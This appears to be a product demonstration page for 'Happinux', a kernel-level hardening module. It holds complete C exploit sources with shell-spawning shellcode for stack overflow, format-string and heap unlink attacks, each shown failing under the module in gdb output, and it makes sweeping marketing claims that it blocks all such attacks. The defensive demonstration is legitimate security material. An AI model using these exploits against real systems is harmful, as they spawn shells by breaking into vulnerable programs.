Happinux Attack Test
Introduction of Happinux hacking prevention mode.

Happinux blocks unknown cracking techniques on kernel level. It has many hacking prevention functions.

Prevention Stack based Buffer Overflow attack

Existing BOF prevention solutions are opened to practical attacks which does not change stack return address directly,

such as off –by –one or frame pointer overwrite.

It does not even notice Return to Library (RTL) BOF attack that does not use shellcode.

Hereupon, Happinux cracking prevention module senses and blocks Stack based BOF with special security policy.

[root@test technic]# cat over.c #include <stdio.h> /* target code */ int main(int argc,char *argv[]) { char x[100]; strcpy(x,argv[1]); } [root@test technic]# cat over_xp.c #include <stdio.h> /* exploit code */ int main() { int i; char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; char *env[2]; char x[200]; memset(x,0,200); env[0]=shellcode; env[1]=NULL; for(i=0;i<0x78;i++) { x[i]=0x41; } *(long *)&x[i]=0x82828282; i+=4; // ebp *(long *)&x[i]=0xbfffffd0; i+=4; // ret execle("./over","over",x,NULL,env); } [root@test technic]#

Output of upper code.

[PIC 1: General stack based overflow exploit]

You can see a new shell runs on general server.

Now, I will show you how does the exploit work on Happinux system with shellcode prevention mode.

[PIC 2: Stack based buffer overflow on Happinux system]

You can see that attack is failed. Next one is the result of debugging..

[root@test technic]# gdb -q over_xp (gdb) r Starting program: /tmp/technic/over_xp Program received signal SIGTRAP, Trace/breakpoint trap. 0x40000be0 in _start () from /lib/ld-linux.so.2 (gdb) c Continuing. execute error: '//bin/sh' This execution used shellcode that use 'Stack'. Its execution is very dangerous. Intercepting execution, This can prevent remote attack or local attack. example) Stack based Overflow, Format String attack ... Program received signal SIGSEGV, Segmentation fault. 0xbffffff7 in ?? () (gdb) x/10x 0xbffffff7 0xbffffff7: 0x7265766f 0x00000000 Cannot access memory at address 0xbfffffff (gdb) x/10x 0xbffffff7-30 0xbfffffd9: 0x31909090 0x6e6852d2 0x6868732f 0x69622f2f 0xbfffffe9: 0x5352e389 0x428de189 0x0080cd0b 0x766f2f2e 0xbffffff9: 0x00007265 Cannot access memory at address 0xbffffffd (gdb)

It shows that Segmentation fault has been occurred because shellcode execution failed.

Prevention Stack, Heap based Format string attack

Many of security solutions are opened to newly appeared attack, which is developed after 2000. Format string attack is one of those,

which works on both stack and heap. No perfect prevention solution is developed until now.

Happinux can sense and block all those practical attack, such as format string attack which use RLT, and small format string.

[root@test technic]# cat format.c #include <stdio.h> /*target code */ int main(int argc,char *argv[]) { char x[100]; strncpy(x,argv[1],100); printf(x); } [root@test technic]# cat for_xp16.c #include <stdio.h> /*exploit code */ #define RET 0x08049528 #define SHELLCODE 0xbfffffd0 #define PAD 4 int main() { int i; long shell=SHELLCODE; int pad=PAD; long a,b; char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; char *env[2]; char x[200]; char head[16]; memset(x,0,200); memset(head,0,16); env[0]=shellcode; env[1]=NULL; *(long *)&head[0]=0x41414141; *(long *)&head[4]=RET; *(long *)&head[8]=0x41414141; *(long *)&head[12]=RET+2; a=(shell>>16)&0xffff; b=(shell>>0)&0xffff; sprintf(x,"%s%%%d$%ux%%%d$n%%%d$%ux%%%d$n", head,pad,b-16,pad+1,pad+2,(0x10000+a)-b,pad+3); printf("%s\n",x); execle("./format","format",x,NULL,env); } [root@test technic]# cat for_xp32.c #include <stdio.h> /* exploit code */ #define RET 0x08049528 #define SHELLCODE 0xbfffffd0 #define PAD 4 int main() { int i; long shell=SHELLCODE; int pad=PAD; long a,b,c,d; long a1,b1,c1,d1; char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; char *env[2]; char x[200]; char head[32]; memset(x,0,200); memset(head,0,32); env[0]=shellcode; env[1]=NULL; *(long *)&head[0]=0x41414141; *(long *)&head[4]=RET; *(long *)&head[8]=0x41414141; *(long *)&head[12]=RET+1; *(long *)&head[16]=0x41414141; *(long *)&head[20]=RET+2; *(long *)&head[24]=0x41414141; *(long *)&head[28]=RET+3; a=(shell>>24)&0xff; b=(shell>>16)&0xff; c=(shell>>8)&0xff; d=(shell>>0)&0xff; a1=(shell>>24)&0xff; b1=(shell>>16)&0xff; c1=(shell>>8)&0xff; d1=(shell>>0)&0xff; if(d1-32<10)d+=0x100; if(c1-d1<10)c+=0x100; if(b1-c1<10)b+=0x100; sprintf(x,"%s%%%d$%ux%%%d$n%%%d$%ux%%%d$n%%%d$%ux%%%d$n%%%d$%ux%%%d$n", head,pad,d-32,pad+1,pad+2,c-d1,pad+3,pad+4,b-c1,pad+5,pad+6,0x100+a-b1,pad+7); printf("%s\n",x); execle("./format","format",x,NULL,env); } [root@test technic]#

First code has format string vulnerability and second one is exploit code that rewrite twice with 16byte retaddr,

last one is exploit code that rewrite three times with 32byte retaddr.

Next picture is output of for_xp16 exploit code and for_xp32 exploit code execution.

               [PIC 3: format string exploit on Happinux system]

You can confirm the attack has been failed.

[root@test technic]# gdb -q for_xp32 (gdb) r Starting program: /tmp/technic/for_xp32 AAAAAAAAAAAAAAAA%4$176x%5$n%6$47x%7$n%8$256x%9$n%10$192x%11$n Program received signal SIGTRAP, Trace/breakpoint trap. 0x40000be0 in _start () from /lib/ld-linux.so.2 (gdb) c Continuing. execute error: '//bin/sh' This execution used shellcode that use 'Stack'. Its execution is very dangerous. Intercepting execution, This can prevent remote attack or local attack. example) Stack based Overflow, Format String attack ... Program received signal SIGSEGV, Segmentation fault. 0xbffffff5 in ?? () (gdb) x/10x 0xbffffff5-30 0xbfffffd7: 0x31909090 0x6e6852d2 0x6868732f 0x69622f2f 0xbfffffe7: 0x5352e389 0x428de189 0x0080cd0b 0x6f662f2e 0xbffffff7: 0x74616d72 0x00000000 (gdb)

After a debugging work, you can confirm a segmentation fault has been occurred even though return address changed to shellcode.

Blocking Heap based Buffer Overflow (double free, malloc/free exploit) attack

Heap based attack, which is one of the newest cracking skill can go round and make the security solutions helpless.

Happinux can sense and block all these latest and even practical attack of it.

[root@test technic]# cat heap.c #include <stdio.h> /*target code */ int main(int argc,char *argv[]) { char *x=(char *)malloc(100); char *y=(char *)malloc(80); strcpy(x,argv[1]); free(x); free(y); } [root@test technic]# cat heap_xp.c #include <stdio.h> /*exploit code */ #define RET 0x08049584 int main() { int i; char shellcode[]= "\xeb\x0c\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; char *env[2]; char x[200]; memset(x,0,200); env[0]=shellcode; env[1]=NULL; for(i=0;i<96;i++) { x[i]=0x40; } *(long *)&x[i]=0xfffffffc; i+=4; *(long *)&x[i]=0xffffffff; i+=4; *(long *)&x[i]=RET-12; i+=4; *(long *)&x[i]=0xbfffffbc; i+=4; execle("./heap","heap",x,NULL,env); } [root@test technic]#

Output of free/malloc exploit based on heap.

               [PIC 4: Heap based buffer overflow attack on Happinux system]

The execution has been canceled because it uses shellcode on stack.

Debugging output

[root@test technic]# gdb -q heap_xp (gdb) r Starting program: /tmp/technic/heap_xp Program received signal SIGTRAP, Trace/breakpoint trap. 0x40000be0 in _start () from /lib/ld-linux.so.2 (gdb) c Continuing. execute error: '//bin/sh' This execution used shellcode that use 'Stack'. Its execution is very dangerous. Intercepting execution, This can prevent remote attack or local attack. example) Stack based Overflow, Format String attack ... Program received signal SIGSEGV, Segmentation fault. 0xbffffffc in ?? () (gdb) x/10x 0xbffffffc-30 0xbfffffde: 0x2f6e6852 0x2f686873 0x8969622f 0x895352e3 0xbfffffee: 0x0b428de1 0x2e0080cd 0x6165682f 0x00000070 0xbffffffe: Cannot access memory at address 0xbffffffe (gdb) q The program is running. Exit anyway? (y or n) y [root@test technic]#

You can confirm shellcode execution has been failed.

-

Blocking System Library abuse attack.

Happinux prevents system library function abuse that is the core of RTL attack.

As a result, other special character “;”(semicolon) vulnerability and PHP injection vulnerability will be blocked.

Blocking Race Condition, Backdoor attack

Happinux blocks race condition attack and backdoor attack, which use symbolic link.

Next picture shows blocking malicious backdoor execution.

               [PIC 5: Setuid backdoor attack on Happinux system]

Blocking Ptrace and kernel hacking attack

Happinux prevents kernel abuse by blocking kernel do_brk, do_mremap vulnerability and ptrace control flow exploit. It is essential function for Secure OS that installed on vulnerable kernel.

[PIC 6: Blocking kernel do_brk exploit]

               [PIC 7: Blocking kernel do_mremap exploit]

Reference: Sample exploits tested on Happinux –

[Download]